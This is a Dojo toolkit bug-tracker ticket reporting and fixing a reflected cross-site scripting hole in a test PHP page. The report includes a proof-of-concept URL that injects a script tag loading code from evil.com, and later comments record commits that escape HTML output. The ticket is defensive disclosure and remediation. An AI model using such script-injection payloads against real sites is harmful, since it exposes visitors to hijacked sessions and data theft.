Opened 8 years ago

Closed 8 years ago

#13674 closed defect (fixed)

borderContainer.php should not allow script attacks

Reported by: Douglas Hays Owned by: bill
Priority: high Milestone: 1.7
Component: Dijit Version: 1.4.0
Keywords: Cc: Colin Snover
Blocked By: Blocking:

Description

We need to plug this security hole:

http://projecttests.customer.com/dojo1.7/dijit/tests/layout/borderContainer.php?id=<script src=http://evil.com/xss/hack.js></script>

Change History (7)

comment:1 Changed 8 years ago by Revin Guillen

In [26183]:

Plug script injection holes in a couple of tests, refs #13674

comment:2 Changed 8 years ago by Revin Guillen

In [26184]:

Plug script injection hole in the _base timeout.php test, refs #13674

comment:3 Changed 8 years ago by Revin Guillen

OK I fixed the places I found in tests where we sent unescaped input out to the browser. There are a few more PHP scripts in the toolkit that do it, in demos and util, but it wasn't clear whether those were really in scope here or what. I may have overstepped by fixing three files as it is.

These are all I have time for right this minute, so if somebody else wants to check those out, be my guest :-)

comment:4 Changed 8 years ago by Douglas Hays

revin, thanks for fixing these. I also see
demos/uploader/UploadFile.php
docscripts/dumpObj.php
Are these the others that you saw? Maybe these should be fixed as well for completeness.

comment:5 Changed 8 years ago by Revin Guillen

In [26607]:

Escape output for HTML, refs #13674

comment:6 Changed 8 years ago by Revin Guillen

In [26609]:

Escape output for HTML, refs #13674

comment:7 Changed 8 years ago by Revin Guillen

Resolution: fixed
Status: newclosed
Note: See TracTickets for help on using tickets.